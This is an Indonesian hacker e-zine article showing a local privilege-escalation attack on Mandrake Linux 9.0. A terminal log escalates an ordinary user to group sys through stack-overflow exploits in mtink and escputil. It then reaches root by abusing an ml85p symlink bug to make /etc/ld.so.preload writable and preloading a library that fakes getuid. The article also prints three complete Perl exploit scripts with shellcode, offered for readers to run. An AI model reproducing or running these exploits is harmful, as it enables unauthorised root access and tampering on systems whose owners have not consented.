Issue‎ > ‎Issue 06‎ > ‎

008.txt

        ____________________   ___ ___ ________   
        \_   _____/\_   ___ \ /   |   \\_____  \  
         |    __)_ /    \  \//    ~    \/   |   \ 
         |        \\     \___\    Y    /    |    \
        /_______  / \______  /\___|_  /\_______  /
                \/         \/       \/         \/ 
                                            .OR.ID
ECHO-ZINE RELEASE
       06
Author: the_day || the_day@echo.or.id 
Online @ www.echo.or.id :: http://ezine.echo.or.id ::YM :the_day2000
==Exploit Mandrake 9.0 Local root==
        
Sekarang kita akan coba sploit mandrake 9.0 dengan local sploit dengan
memanfatkan bug ml85p yg ada pada mdk 9.0 secara default.Artikel ini diambil dari
http://bismark.extracon.it.dan dicoba di mdk 9.0
        [the_day@mysarah data]$ls -l /usr/bin/ml85p
        -rwsr-x--- 1 root sys 12344 Set 17 13:20 /usr/bin/ml85p
        Terlihat bahwa group file ml85p adalah sys
         
        [the_day@mysarah data]$ls -l /usr/bin/mtink
        -rwxr-sr-x 1 lp sys 132600 Set 17 13:20 /usr/bin/mtink
        [the_day@mysarah data]$ls -l /usr/bin/escputil
        -rwxr-sr-x 1 lp sys 32088 Set 17 13:20 /usr/bin/escputil
        Diatas adalah file2 yg vuln dan mempunyai bug .
        file mtink vuln stack overflow dan escputil
        stack over dalam command line arg. 
        Disini kita akan sploit dan mendapatkan gid sys melalui
        vuln dari kedua file tadi.
        [the_day@mysarah data]$id
        uid=501(the_day) gid=501(the_day) groups=501(the_day)
        [the_day@mysarah temp]$perl priv8mtink.pl
        Priv8security.com Mandrake 9 mtink local sys exploit!!
        usage: priv8mtink.pl offset
        Using address: 0xbffffa80
        sh-2.05b$ id
        uid=501(the_day) gid=3(sys) groups=501(the_day)
        yup kita udah bs ke gid sys
        Sekarang kita coba local sploit ml85p
        
        = Membuat file kedalam system
                sh-2.05b$perl priv8ml85p.pl /root/test
                Let write some files ok ;p
                Now just press enter ;)
                Wrong file format.
                file position: ffffffff
                sh-2.05b$
        
                [the_day@mysarah root]#pwd
                /root
                [the_day@mysarah root]#ls -l test
                -rw-r--r--    1 root     sys         1064 May 18 15:43 test
        = Getting root
                [the_day@mysarah root]#id
                uid=501(the_day) gid=3(sys) groups=501(the_day)
                sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
                Let write some files ok ;p
                Now just press enter ;)
                Wrong file format.
                file position: ffffffff
                sh-2.05b$ ls -l /etc/ld.so.preload
                -rw-rw-rw- 1 root sys 3 May 18 15:50    /etc/ld.so.preload
                sh-2.05b$ cd /tmp
                sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
                sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
                sh-2.05b$ gcc -fPIC -c /tmp/lib.c
                sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
                sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
                sh-2.05b$ su -
                [root@mysarah temp]# id
                uid=0(root) gid=0(root) groups=0(root) 
        Yup kita sudah dapat akses root :)
        
        ------------------------------------------------------------------------
        priv8escputil.pl
        ------------------------------------------------------------------------
        #!/usr/bin/perl
        ######################################################
        #Priv8security.com escputil local sys exploit.
        #
        # Tested on Mandrake 9.0 only.
        # Based on
        #http://www.idefense.com/advisory/01.21.03.txt
        #####################################################
        $shellcode =
        "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
        "\x03". # x = x03 sys gid
        "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
        "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
        $size = 1050;
        $retaddr = 0xbffff4e0;
        $nop = "\x90";
        $offset = 0;
        
        if (@ARGV == 1) {
        $offset = $ARGV[0];
        }
        print " Priv8security.com Mandrake 9 escputil local
        sys exploit!!\n";
        print " usage: $0 offset\n";
        for ($i = 0; $i < ($size - length($shellcode) - 4);
        $i++) {
        $buffer .= $nop;
        }
        $buffer .= $shellcode;
        print " Using address: 0x",
        sprintf('%lx',($retaddr + $offset)), "\n";
        $newret = pack('l', ($retaddr +
        $offset));
        for ($i += length($shellcode); $i <
        $size; $i += 4) {
        $buffer .= $newret;
        }
        exec("/usr/bin/escputil -c -P
        $buffer");
        ------------------------------------------------------------------------
        priv8ml85p.pl
        ------------------------------------------------------------------------
        #!/usr/bin/perl
        ######################################################
        #Priv8security.com ml85p local root exploit.
        # This exploit erase any file on system, u ll need group sys to do it
        # so run priv8mtink.pl or priv8escputil.pl to getit ;)
        # Tested on Mandrake 9.0 only.
        # Based on
        #http://www.idefense.com/advisory/01.21.03.txt
        #####################################################
        if (@ARGV == 1) {
        $file = $ARGV[0];
        $b = "/tmp/ml85g";
        $b .= time();
        exec(umask 000);
        system("ln -s $file '$b'");
        print "Lets write some files ok ;p\n";
        print "Now just press enter....\n";
        if (system("/usr/bin/ml85p -s") == -1){
        print "You cant run ml85p, check
        if u have gid sys...\n";
        }
        exit(1);
        } else {
        print "\n!!! Priv8security.com ml85p local
        root exploit by wsxz !!!\n";
        print " Usage: perl $0
        file-to-overwrite\n\n";
        }
        ------------------------------------------------------------------------
        priv8mtink.pl
        ------------------------------------------------------------------------
        #!/usr/bin/perl
        ######################################################
        #Priv8security.com mtink local sys exploit.
        # Tested on Mandrake 9.0 only.
        # Based on
        #http://www.idefense.com/advisory/01.21.03.txt
        #####################################################
        $shellcode2 =
        "\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
        "\x03". # x = x03 sys gid
        "\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
        "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
        $size = 1056;
        $retaddr = 0xbffffa80;
        $nop = "\x90";
        $offset = 0;
        if (@ARGV == 1) {
        $offset = $ARGV[0];
        }
        print " Priv8security.com Mandrake 9 mtink local sys exploit!!\n";
        print " usage: $0 offset\n";
        for ($i = 0; $i < ($size -
        length($shellcode2) - 4); $i++) {
        $buffer .= $nop;
        }
        $buffer .= $shellcode2;
        print " Using address: 0x",
        sprintf('%lx',($retaddr + $offset)), "\n";
        $newret = pack('l', ($retaddr + $offset));
        for ($i += length($shellcode2); $i< $size; $i += 4) {
        $buffer .= $newret;
        }
        local($ENV{'HOME'}) = $buffer;
        exec("/usr/bin/mtink");
        -----------------------------------------------------------------------
        Mungkin hanya ini yg bisa aku kasih .maaf kalau ada kekurangan :D.        
        EOF
                                                                                                   
                                                                                                  [the_day]
   
        REFERENSI
                
        http://bismark.extracon.it          
        *greetz to: 
        [echostaff a.k.a y3dips, moby, comex ,z3r0byt3,K-159,c-a-s-e] && sarah[MY LOVELY], 
        m_beben,yudhax,bithedz
        anak2 newbie_hacker,$the community,$peci@l temen2 seperjuangan 
        kritik && saran kirimkan ke the_day[at]echo.or.id
Comments